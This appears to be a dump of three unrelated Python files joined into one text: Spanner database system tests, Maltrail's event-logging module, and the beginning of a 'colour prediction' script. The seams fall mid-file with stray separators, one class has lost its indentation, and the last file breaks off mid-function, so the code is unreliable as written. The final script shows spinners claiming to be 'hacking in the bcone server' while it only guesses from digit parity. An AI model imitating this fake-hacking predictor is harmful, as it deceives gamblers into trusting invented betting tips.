    """Run *sql* with bound *params* and compare rows against *expected*.

    When *order* is true and the statement has no ORDER BY yet, one is
    appended so the row-order comparison is deterministic.
    """
    if order and "ORDER" not in sql:
        sql += " ORDER BY pkey"
    with database.snapshot() as snapshot:
        rows = list(
            snapshot.execute_sql(sql, params=params, param_types=param_types)
        )
    self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
    """A strong multi-use snapshot still sees rows deleted after it began."""
    row_count = 40
    self._set_up_table(row_count)
    all_data_rows = list(self._row_data(row_count))
    with self._db.snapshot(multi_use=True) as strong:
        before = list(strong.execute_sql(self.SQL))
        self._check_row_data(before, all_data_rows)
        with self._db.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        # Snapshot isolation: the delete above is invisible to `strong`.
        after = list(strong.execute_sql(self.SQL))
        self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
    """ARRAY(SELECT AS STRUCT ...) round-trips as nested lists."""
    sql = (
        "SELECT ARRAY(SELECT AS STRUCT C1, C2 "
        "FROM (SELECT 'a' AS C1, 1 AS C2 "
        "UNION ALL SELECT 'b' AS C1, 2 AS C2) "
        "ORDER BY C1 ASC)"
    )
    self._check_sql_results(
        self._db,
        sql=sql,
        params=None,
        param_types=None,
        expected=[[[["a", 1], ["b", 2]]]],
    )
def test_execute_sql_returning_empty_array_of_struct(self):
    """ARRAY(SELECT AS STRUCT ...) over an empty join yields an empty list."""
    sql = (
        "SELECT ARRAY(SELECT AS STRUCT C1, C2 "
        "FROM (SELECT 2 AS C1) X "
        "JOIN (SELECT 1 AS C2) Y "
        "ON X.C1 = Y.C2 "
        "ORDER BY C1 ASC)"
    )
    # NOTE(review): this snapshot is created but never used — looks vestigial.
    self._db.snapshot(multi_use=True)
    self._check_sql_results(
        self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
    )
def test_invalid_type(self):
    """Inserting a value of the wrong column type raises FailedPrecondition."""
    table = "counters"
    columns = ("name", "value")

    valid_input = (("", 0),)
    with self._db.batch() as batch:
        batch.delete(table, self.ALL)
        batch.insert(table, columns, valid_input)

    # Swapped types: int for the STRING column, str for the INT64 column.
    invalid_input = ((0, ""),)
    with self.assertRaises(exceptions.FailedPrecondition):
        with self._db.batch() as batch:
            batch.delete(table, self.ALL)
            batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
    """Smoke test: SELECT 1 returns a single row (1,)."""
    # NOTE(review): this snapshot is created but never used — looks vestigial.
    self._db.snapshot(multi_use=True)

    # Hello, world query
    self._check_sql_results(
        self._db,
        sql="SELECT 1",
        params=None,
        param_types=None,
        expected=[(1,)],
        order=False,
    )
def _bind_test_helper(
    self, type_name, single_value, array_value, expected_array_value=None
):
    """Exercise query-parameter binding for one scalar type.

    Runs five checks for *type_name*: non-null scalar, NULL scalar,
    non-null array, empty array, and NULL array.  When the round-trip
    changes representation, callers pass *expected_array_value*.
    """
    # NOTE(review): this snapshot is created but never used — looks vestigial.
    self._db.snapshot(multi_use=True)

    # Bind a non-null <type_name>
    self._check_sql_results(
        self._db,
        sql="SELECT @v",
        params={"v": single_value},
        param_types={"v": Type(code=type_name)},
        expected=[(single_value,)],
        order=False,
    )

    # Bind a null <type_name>
    self._check_sql_results(
        self._db,
        sql="SELECT @v",
        params={"v": None},
        param_types={"v": Type(code=type_name)},
        expected=[(None,)],
        order=False,
    )

    # Bind an array of <type_name>
    array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
    if expected_array_value is None:
        expected_array_value = array_value
    self._check_sql_results(
        self._db,
        sql="SELECT @v",
        params={"v": array_value},
        param_types={"v": array_type},
        expected=[(expected_array_value,)],
        order=False,
    )

    # Bind an empty array of <type_name>
    self._check_sql_results(
        self._db,
        sql="SELECT @v",
        params={"v": []},
        param_types={"v": array_type},
        expected=[([],)],
        order=False,
    )

    # Bind a null array of <type_name>
    self._check_sql_results(
        self._db,
        sql="SELECT @v",
        params={"v": None},
        param_types={"v": array_type},
        expected=[(None,)],
        order=False,
    )
def test_execute_sql_w_string_bindings(self):
    """Bind STRING scalar and array parameters."""
    self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
    """Bind BOOL scalar and array parameters."""
    self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
    """Bind INT64 scalar and array parameters."""
    self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
    """Bind FLOAT64 scalar and array parameters."""
    self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
    """Bind -inf / +inf FLOAT64 parameters and read them back."""
    # Find -inf
    self._check_sql_results(
        self._db,
        sql="SELECT @neg_inf",
        params={"neg_inf": NEG_INF},
        param_types={"neg_inf": param_types.FLOAT64},
        expected=[(NEG_INF,)],
        order=False,
    )

    # Find +inf
    self._check_sql_results(
        self._db,
        sql="SELECT @pos_inf",
        params={"pos_inf": POS_INF},
        param_types={"pos_inf": param_types.FLOAT64},
        expected=[(POS_INF,)],
        order=False,
    )
def test_execute_sql_w_bytes_bindings(self):
    """Bind BYTES scalar and array parameters."""
    self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
    """Bind TIMESTAMP parameters; round-tripped values come back UTC-aware."""
    import pytz
    from google.api_core.datetime_helpers import DatetimeWithNanoseconds

    timestamp_1 = DatetimeWithNanoseconds(
        1989, 1, 17, 17, 59, 12, nanosecond=345612789
    )
    timestamp_2 = DatetimeWithNanoseconds(
        1989, 1, 17, 17, 59, 13, nanosecond=456127893
    )
    timestamps = [timestamp_1, timestamp_2]

    # In round-trip, timestamps acquire a timezone value.
    expected_timestamps = [
        timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
    ]

    # NOTE(review): presumably disables elementwise list comparison in the
    # row-check helper for these nanosecond objects — confirm.
    self._recurse_into_lists = False
    self._bind_test_helper(
        TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
    )
def test_execute_sql_w_date_bindings(self):
    """Bind DATE scalar and array parameters."""
    import datetime

    dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
    self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
    """Bind NUMERIC scalar and array parameters (skipped on the emulator)."""
    self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
def test_execute_sql_w_query_param_struct(self):
    """Exercise STRUCT-typed query parameters.

    Covers: null/non-null structs, nested structs, empty struct types,
    struct equality, arrays of structs, struct fields that are arrays,
    anonymous/repeated field names, and returning a struct value.
    """
    name = "Phred"
    count = 123
    size = 23.456
    height = 188.0
    weight = 97.6

    record_type = param_types.Struct(
        [
            param_types.StructField("name", param_types.STRING),
            param_types.StructField("count", param_types.INT64),
            param_types.StructField("size", param_types.FLOAT64),
            param_types.StructField(
                "nested",
                param_types.Struct(
                    [
                        param_types.StructField("height", param_types.FLOAT64),
                        param_types.StructField("weight", param_types.FLOAT64),
                    ]
                ),
            ),
        ]
    )

    # Query with null struct, explicit type
    self._check_sql_results(
        self._db,
        sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
        params={"r": None},
        param_types={"r": record_type},
        expected=[(None, None, None, None)],
        order=False,
    )

    # Query with non-null struct, explicit type, NULL values
    self._check_sql_results(
        self._db,
        sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
        params={"r": (None, None, None, None)},
        param_types={"r": record_type},
        expected=[(None, None, None, None)],
        order=False,
    )

    # Query with non-null struct, explicit type, nested NULL values
    self._check_sql_results(
        self._db,
        sql="SELECT @r.nested.weight",
        params={"r": (None, None, None, (None, None))},
        param_types={"r": record_type},
        expected=[(None,)],
        order=False,
    )

    # Query with non-null struct, explicit type
    self._check_sql_results(
        self._db,
        sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
        params={"r": (name, count, size, (height, weight))},
        param_types={"r": record_type},
        expected=[(name, count, size, weight)],
        order=False,
    )

    # Query with empty struct, explicitly empty type
    empty_type = param_types.Struct([])
    self._check_sql_results(
        self._db,
        sql="SELECT @r IS NULL",
        params={"r": ()},
        param_types={"r": empty_type},
        expected=[(False,)],
        order=False,
    )

    # Query with null struct, explicitly empty type
    self._check_sql_results(
        self._db,
        sql="SELECT @r IS NULL",
        params={"r": None},
        param_types={"r": empty_type},
        expected=[(True,)],
        order=False,
    )

    # Query with equality check for struct value
    struct_equality_query = (
        "SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
    )
    struct_type = param_types.Struct(
        [
            param_types.StructField("threadf", param_types.INT64),
            param_types.StructField("userf", param_types.STRING),
        ]
    )
    self._check_sql_results(
        self._db,
        sql=struct_equality_query,
        params={"struct_param": (1, "bob")},
        param_types={"struct_param": struct_type},
        expected=[(True,)],
        order=False,
    )

    # Query with nullness test for struct
    self._check_sql_results(
        self._db,
        sql="SELECT @struct_param IS NULL",
        params={"struct_param": None},
        param_types={"struct_param": struct_type},
        expected=[(True,)],
        order=False,
    )

    # Query with null array-of-struct
    array_elem_type = param_types.Struct(
        [param_types.StructField("threadid", param_types.INT64)]
    )
    array_type = param_types.Array(array_elem_type)
    self._check_sql_results(
        self._db,
        sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
        params={"struct_arr_param": None},
        param_types={"struct_arr_param": array_type},
        expected=[],
        order=False,
    )

    # Query with non-null array-of-struct
    self._check_sql_results(
        self._db,
        sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
        params={"struct_arr_param": [(123,), (456,)]},
        param_types={"struct_arr_param": array_type},
        expected=[(123,), (456,)],
        order=False,
    )

    # Query with null array-of-struct field
    struct_type_with_array_field = param_types.Struct(
        [
            param_types.StructField("intf", param_types.INT64),
            param_types.StructField("arraysf", array_type),
        ]
    )
    self._check_sql_results(
        self._db,
        sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
        params={"struct_param": (123, None)},
        param_types={"struct_param": struct_type_with_array_field},
        expected=[],
        order=False,
    )

    # Query with non-null array-of-struct field
    self._check_sql_results(
        self._db,
        sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
        params={"struct_param": (123, ((456,), (789,)))},
        param_types={"struct_param": struct_type_with_array_field},
        expected=[(456,), (789,)],
        order=False,
    )

    # Query with anonymous / repeated-name fields
    anon_repeated_array_elem_type = param_types.Struct(
        [
            param_types.StructField("", param_types.INT64),
            param_types.StructField("", param_types.STRING),
        ]
    )
    anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
    self._check_sql_results(
        self._db,
        sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
        "FROM UNNEST(@struct_param) t",
        params={"struct_param": [(123, "abcdef")]},
        param_types={"struct_param": anon_repeated_array_type},
        expected=[(123, "abcdef")],
        order=False,
    )

    # Query and return a struct parameter
    value_type = param_types.Struct(
        [
            param_types.StructField("message", param_types.STRING),
            param_types.StructField("repeat", param_types.INT64),
        ]
    )
    value_query = (
        "SELECT ARRAY(SELECT AS STRUCT message, repeat "
        "FROM (SELECT @value.message AS message, "
        "@value.repeat AS repeat)) AS value"
    )
    self._check_sql_results(
        self._db,
        sql=value_query,
        params={"value": ("hello", 1)},
        param_types={"value": value_type},
        expected=[([["hello", 1]],)],
        order=False,
    )
def test_execute_sql_returning_transfinite_floats(self):
    """-inf / +inf / NaN survive as column values and inside arrays."""
    with self._db.snapshot(multi_use=True) as snapshot:
        # Query returning -inf, +inf, NaN as column values
        rows = list(
            snapshot.execute_sql(
                "SELECT "
                'CAST("-inf" AS FLOAT64), '
                'CAST("+inf" AS FLOAT64), '
                'CAST("NaN" AS FLOAT64)'
            )
        )
        self.assertEqual(len(rows), 1)
        self.assertEqual(rows[0][0], float("-inf"))
        self.assertEqual(rows[0][1], float("+inf"))
        # NaNs cannot be compared by equality.
        self.assertTrue(math.isnan(rows[0][2]))

        # Query returning array of -inf, +inf, NaN as one column
        rows = list(
            snapshot.execute_sql(
                "SELECT"
                ' [CAST("-inf" AS FLOAT64),'
                ' CAST("+inf" AS FLOAT64),'
                ' CAST("NaN" AS FLOAT64)]'
            )
        )
        self.assertEqual(len(rows), 1)
        float_array = rows[0][0]
        self.assertEqual(float_array[0], float("-inf"))
        self.assertEqual(float_array[1], float("+inf"))
        # NaNs cannot be searched for by equality.
        self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
    """Partitioned query over the whole table covers exactly all rows."""
    row_count = 40
    sql = "SELECT * FROM {}".format(self.TABLE)
    committed = self._set_up_table(row_count)

    # Partitioned query does not support ORDER BY, so compare as sets.
    all_data_rows = set(self._row_data(row_count))
    union = set()
    batch_txn = self._db.batch_snapshot(read_timestamp=committed)
    for batch in batch_txn.generate_query_batches(sql):
        p_results_iter = batch_txn.process(batch)
        # Lists aren't hashable so the results need to be converted
        rows = [tuple(result) for result in p_results_iter]
        union.update(set(rows))

    self.assertEqual(union, all_data_rows)
    batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
    """System tests for result sets large enough to be chunked by the backend.

    Requires fixtures created by ``tests/system/utils/populate_streaming.py``.
    """

    @classmethod
    def setUpClass(cls):
        from tests.system.utils.streaming_utils import INSTANCE_NAME
        from tests.system.utils.streaming_utils import DATABASE_NAME

        instance = Config.CLIENT.instance(INSTANCE_NAME)
        if not instance.exists():
            raise unittest.SkipTest(
                "Run 'tests/system/utils/populate_streaming.py' to enable."
            )
        database = instance.database(DATABASE_NAME)
        # BUGFIX: previously re-checked instance.exists(); the *database*
        # must be checked before use.
        if not database.exists():
            raise unittest.SkipTest(
                "Run 'tests/system/utils/populate_streaming.py' to enable."
            )
        cls._db = database

    def _verify_one_column(self, table_desc):
        """Assert every row of *table_desc*'s table holds the expected value."""
        sql = "SELECT chunk_me FROM {}".format(table_desc.table)
        with self._db.snapshot() as snapshot:
            rows = list(snapshot.execute_sql(sql))
        self.assertEqual(len(rows), table_desc.row_count)
        expected = table_desc.value()
        for row in rows:
            self.assertEqual(row[0], expected)

    def _verify_two_columns(self, table_desc):
        """Assert both columns of every row hold the expected value."""
        sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
        with self._db.snapshot() as snapshot:
            rows = list(snapshot.execute_sql(sql))
        self.assertEqual(len(rows), table_desc.row_count)
        expected = table_desc.value()
        for row in rows:
            self.assertEqual(row[0], expected)
            self.assertEqual(row[1], expected)

    def test_four_kay(self):
        from tests.system.utils.streaming_utils import FOUR_KAY

        self._verify_one_column(FOUR_KAY)

    def test_forty_kay(self):
        from tests.system.utils.streaming_utils import FORTY_KAY

        self._verify_one_column(FORTY_KAY)

    def test_four_hundred_kay(self):
        from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY

        self._verify_one_column(FOUR_HUNDRED_KAY)

    def test_four_meg(self):
        from tests.system.utils.streaming_utils import FOUR_MEG

        self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
    """Arbitrary user-defined exception type used to exercise error paths."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
    """Helper for tests provoking abort-during-read.

    Two unit-of-work callbacks are meant to run in separate threads; the
    ``threading.Event`` objects interleave them so the "provoker" commits a
    conflicting update to KEY1 while the "handler" transaction is mid-read.
    """

    KEY1 = "key1"
    KEY2 = "key2"

    def __init__(self):
        self.provoker_started = threading.Event()
        self.provoker_done = threading.Event()
        self.handler_running = threading.Event()
        self.handler_done = threading.Event()

    def _provoke_abort_unit_of_work(self, transaction):
        # Read KEY1, wait until the handler is running, then write a
        # conflicting update to KEY1.
        keyset = KeySet(keys=[(self.KEY1,)])
        rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))

        assert len(rows) == 1
        row = rows[0]
        value = row[1]

        self.provoker_started.set()
        self.handler_running.wait()

        transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])

    def provoke_abort(self, database):
        database.run_in_transaction(self._provoke_abort_unit_of_work)
        self.provoker_done.set()

    def _handle_abort_unit_of_work(self, transaction):
        # Read KEY1, then wait for the provoker's conflicting commit before
        # continuing with KEY2 and writing the sum.
        keyset_1 = KeySet(keys=[(self.KEY1,)])
        rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))

        assert len(rows_1) == 1
        row_1 = rows_1[0]
        value_1 = row_1[1]

        self.handler_running.set()
        self.provoker_done.wait()

        keyset_2 = KeySet(keys=[(self.KEY2,)])
        rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))

        assert len(rows_2) == 1
        row_2 = rows_2[0]
        value_2 = row_2[1]

        transaction.update(
            COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
        )

    def handle_abort(self, database):
        database.run_in_transaction(self._handle_abort_unit_of_work)
        self.handler_done.set()
class FauxCall(object):
    """Minimal stand-in for a gRPC call object, exposing the handful of
    accessors the client library consults when classifying an error."""

    def __init__(self, code, details="FauxCall"):
        self._code = code
        self._details = details

    def code(self):
        """Return the status code supplied at construction."""
        return self._code

    def details(self):
        """Return the detail string supplied at construction."""
        return self._details

    def initial_metadata(self):
        """No metadata is simulated."""
        return {}

    def trailing_metadata(self):
        """No metadata is simulated."""
        return {}
|
log.py | #!/usr/bin/env python2
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
import os
import re
import signal
import socket
import SocketServer
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import VERSION
from core.ignore import ignore_event
# Buffered events awaiting condensation, keyed by (src_ip, trail).
_condensed_events = {}
# Background flusher thread (started lazily by log_event).
_condensing_thread = None
_condensing_lock = threading.Lock()
# Per-thread cached log handles and log-throttling state.
_thread_data = threading.local()
def create_log_directory():
    """Create config.LOG_DIR (mode 0755) if missing, bailing out when not
    running with sufficient privileges."""
    if not os.path.isdir(config.LOG_DIR):
        if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
            exit("[!] please rerun with sudo/Administrator privileges")
        os.makedirs(config.LOG_DIR, 0755)  # NOTE: Python 2 octal literal

    print("[i] using '%s' for log storage" % config.LOG_DIR)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
    """Return an OS file descriptor for the per-day event log of *sec*.

    With reuse=True (default) the descriptor is cached per-thread and
    rotated when the date changes; with reuse=False the caller owns (and
    must close) a fresh descriptor.
    """
    retval = None
    localtime = time.localtime(sec)
    # Daily log file named YYYY-MM-DD.log inside LOG_DIR.
    _ = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
    if not reuse:
        if not os.path.exists(_):
            open(_, "w+").close()
            os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)

        retval = os.open(_, flags)
    else:
        # Rotate the thread-cached handle when the target path changed
        # (i.e. the day rolled over).
        if _ != getattr(_thread_data, "event_log_path", None):
            if getattr(_thread_data, "event_log_handle", None):
                try:
                    os.close(_thread_data.event_log_handle)
                except OSError:
                    pass

            if not os.path.exists(_):
                open(_, "w+").close()
                os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)

            _thread_data.event_log_path = _
            _thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)

        retval = _thread_data.event_log_handle

    return retval
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
    """Return a per-thread cached OS file descriptor for LOG_DIR/error.log,
    creating the file with restricted permissions on first use."""
    if not hasattr(_thread_data, "error_log_handle"):
        _ = os.path.join(config.LOG_DIR, "error.log")
        if not os.path.exists(_):
            open(_, "w+").close()
            os.chmod(_, DEFAULT_ERROR_LOG_PERMISSIONS)

        _thread_data.error_log_path = _
        _thread_data.error_log_handle = os.open(_thread_data.error_log_path, flags)

    return _thread_data.error_log_handle
def safe_value(value):
    """Render *value* for space-delimited log output.

    Falsy values (None, 0, "") become '-'; values containing a space or a
    double quote are wrapped in quotes with embedded quotes doubled
    (CSV-style); CR/LF characters collapse to single spaces.
    """
    rendered = str(value or '-')
    needs_quoting = (' ' in rendered) or ('"' in rendered)
    if needs_quoting:
        rendered = '"%s"' % rendered.replace('"', '""')
    return re.sub(r"[\x0a\x0d]", " ", rendered)
def flush_condensed_events():
    """Background loop: periodically merge buffered duplicate events and
    re-emit one condensed event per (src_ip, trail) key.

    Fields 3..6 (src_port, dst_ip, dst_port, proto) that differ across the
    buffered events are collapsed into comma-joined value lists.
    """
    while True:
        time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
        with _condensing_lock:
            for key in _condensed_events:
                condensed = False
                events = _condensed_events[key]
                first_event = events[0]
                condensed_event = [_ for _ in first_event]
                for i in xrange(1, len(events)):
                    current_event = events[i]
                    for j in xrange(3, 7):  # src_port, dst_ip, dst_port, proto
                        if current_event[j] != condensed_event[j]:
                            condensed = True
                            if not isinstance(condensed_event[j], set):
                                condensed_event[j] = set((condensed_event[j],))
                            condensed_event[j].add(current_event[j])

                if condensed:
                    # Render each merged set as a sorted comma-joined string.
                    for i in xrange(len(condensed_event)):
                        if isinstance(condensed_event[i], set):
                            condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))

                log_event(condensed_event, skip_condensing=True)

            _condensed_events.clear()
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
    """Process one detection event.

    Applies ignore/whitelist filters, optionally buffers the event for
    condensation, throttles duplicates per time bucket, then writes it to
    the local daily log and/or forwards it to the UDP log server, syslog
    (CEF format) and any configured plugin callbacks.
    """
    global _condensing_thread

    # Lazily start the single background thread that flushes condensed events.
    if _condensing_thread is None:
        _condensing_thread = threading.Thread(target=flush_condensed_events)
        _condensing_thread.daemon = True
        _condensing_thread.start()

    try:
        sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
        if ignore_event(event_tuple):
            return

        if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS):  # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
            if not skip_write:
                localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)

                if not skip_condensing:
                    if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
                        # Buffer for the condensing thread instead of logging now.
                        with _condensing_lock:
                            key = (src_ip, trail)
                            if key not in _condensed_events:
                                _condensed_events[key] = []
                            _condensed_events[key].append(event_tuple)

                        return

                current_bucket = sec / config.PROCESS_COUNT
                if getattr(_thread_data, "log_bucket", None) != current_bucket:  # log throttling
                    _thread_data.log_bucket = current_bucket
                    _thread_data.log_trails = set()
                else:
                    if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
                        return
                    else:
                        _thread_data.log_trails.add((src_ip, trail))
                        _thread_data.log_trails.add((dst_ip, trail))

                event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))

                if not config.DISABLE_LOCAL_LOG_STORAGE:
                    handle = get_event_log_handle(sec)
                    os.write(handle, event)

                if config.LOG_SERVER:
                    if config.LOG_SERVER.count(':') > 1:  # bracketed IPv6 "[addr]:port"
                        remote_host, remote_port = config.LOG_SERVER.replace('[', '').replace(']', '').rsplit(':', 1)

                        # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
                        _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
                        _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV

                        _address = socket.getaddrinfo(remote_host, int(remote_port) if str(remote_port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
                    else:
                        remote_host, remote_port = config.LOG_SERVER.split(':')
                        _address = (remote_host, int(remote_port))

                    s = socket.socket(socket.AF_INET if len(_address) == 2 else socket.AF_INET6, socket.SOCK_DGRAM)
                    s.sendto("%s %s" % (sec, event), _address)

                if config.SYSLOG_SERVER:
                    extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
                    _ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(config.TRAILS_FILE))), name=info, severity=0, extension=extension)
                    remote_host, remote_port = config.SYSLOG_SERVER.split(':')
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    s.sendto(_, (remote_host, int(remote_port)))

                # BUGFIX: any() takes a single iterable; the original
                # any(config.LOG_SERVER, config.SYSLOG_SERVER) raised
                # TypeError at runtime.
                if config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER)) or config.console:
                    sys.stderr.write(event)
                    sys.stderr.flush()

            if config.plugin_functions:
                for _ in config.plugin_functions:
                    _(event_tuple, packet)
    except (OSError, IOError):
        if config.SHOW_DEBUG:
            traceback.print_exc()
def log_error(msg):
    """Append a timestamped line with *msg* to error.log, best-effort
    (I/O failures are only reported when SHOW_DEBUG is set)."""
    try:
        handle = get_error_log_handle()
        os.write(handle, "%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg))
    except (OSError, IOError):
        if config.SHOW_DEBUG:
            traceback.print_exc()
def start_logd(address=None, port=None, join=False):
    """Run the UDP log-collecting server.

    Each datagram is "<sec> <event-line>"; the handler appends the event
    to the daily log for that timestamp.  With join=True the server runs
    in the calling thread, otherwise in a daemon thread.
    """
    class ThreadingUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
        pass

    class UDPHandler(SocketServer.BaseRequestHandler):
        def handle(self):
            try:
                data, _ = self.request
                sec, event = data.split(" ", 1)
                handle = get_event_log_handle(int(sec), reuse=False)
                os.write(handle, event)
                os.close(handle)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

    # IPv6 support
    if ':' in (address or ""):
        address = address.strip("[]")
        SocketServer.UDPServer.address_family = socket.AF_INET6

        # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
        _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
        _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV

        _address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
    else:
        _address = (address or '', int(port) if str(port or "").isdigit() else 0)

    server = ThreadingUDPServer(_address, UDPHandler)

    print "[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1])

    if join:
        server.serve_forever()
    else:
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
def set_sigterm_handler():
    """Install a SIGTERM handler that logs the signal and exits cleanly
    (no-op on platforms without SIGTERM)."""
    if not hasattr(signal, "SIGTERM"):
        return

    def _on_sigterm(signum, frame):
        log_error("SIGTERM")
        raise SystemExit

    signal.signal(signal.SIGTERM, _on_sigterm)
# Register the SIGTERM handler when imported as a module — presumably the
# direct-run entry point installs its own handlers (TODO confirm).
if __name__ != "__main__":
    set_sigterm_handler()
|
trial3.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
# Hard-coded expiry date gating the "licensed" branch below.
expirydate = datetime.date(2021, 9, 24)
#expirydate = datetime.date(2021, 8, 30)
today = date.today()

# ANSI escape sequences for colored terminal output.
green = "\033[3;32m"
neon = "\033[3;36m"
nc = "\033[00m"
red = "\033[3;31m"
purple = "\033[3;34m"
yellow = "\033[3;33m"
voilet = "\033[3;35m"
def hero():
    """Interactive loop: prompts for a price and prints a "prediction"
    (red/green based on digit-sum parity) for the next period.

    Relies on the module-level global ``period`` being assigned before the
    call, and on ``system``/``figlet`` for the banner output.
    """

    def chalo():
        # Spinner animation shown while sleeping 20s.
        done = False

        def animate():
            for c in itertools.cycle(['|', '/', '-', '\\']):
                if done:
                    break
                sys.stdout.write('\rhacking in the bcone server for next colour--------- ' + c)
                sys.stdout.flush()
                time.sleep(0.1)
            sys.stdout.write('\rDone! ')

        t = threading.Thread(target=animate)
        t.start()
        time.sleep(20)
        done = True

    def chalo1():
        # Second spinner with a different message.
        done = False

        def animate():
            for c in itertools.cycle(['|', '/', '-', '\\']):
                if done:
                    break
                sys.stdout.write('\rgetting the colour wait --------- ' + c)
                sys.stdout.flush()
                time.sleep(0.1)
            sys.stdout.write('\rDone! ')

        t = threading.Thread(target=animate)
        t.start()
        time.sleep(20)
        done = True

    def clear():
        # for windows
        if name == 'nt':
            _ = system('cls')
        # for mac and linux(here, os.name is 'posix')
        else:
